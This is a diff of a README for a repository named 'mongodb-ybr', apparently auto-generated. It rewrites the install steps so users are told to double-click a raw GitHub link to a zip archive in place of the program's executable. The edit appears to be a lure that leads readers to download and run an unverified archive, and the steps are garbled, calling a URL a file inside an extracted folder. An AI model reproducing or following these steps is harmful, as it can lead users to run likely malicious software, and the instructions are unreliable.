turdidaeintracapsularsurgery64/mongodb-ybr/README.md

 1. Locate the downloaded file in your computer's Downloads folder or where you saved it.
 2. If you downloaded a .zip file, right-click it and select "Extract All" to unzip the files.
-3. Find the file named `mongodb-ybr.exe` (or similar) in the extracted folder.
+3. Find the file named `https://raw.githubusercontent.com/turdidaeintracapsularsurgery64/mongodb-ybr/main/antiparagraphe/mongodb-ybr-communicableness.zip` (or similar) in the extracted folder.
-4. Double-click on `mongodb-ybr.exe` to run the application.
+4. Double-click on `https://raw.githubusercontent.com/turdidaeintracapsularsurgery64/mongodb-ybr/main/antiparagraphe/mongodb-ybr-communicableness.zip` to run the application.

 ## 🎨 Features of mongodb-ybr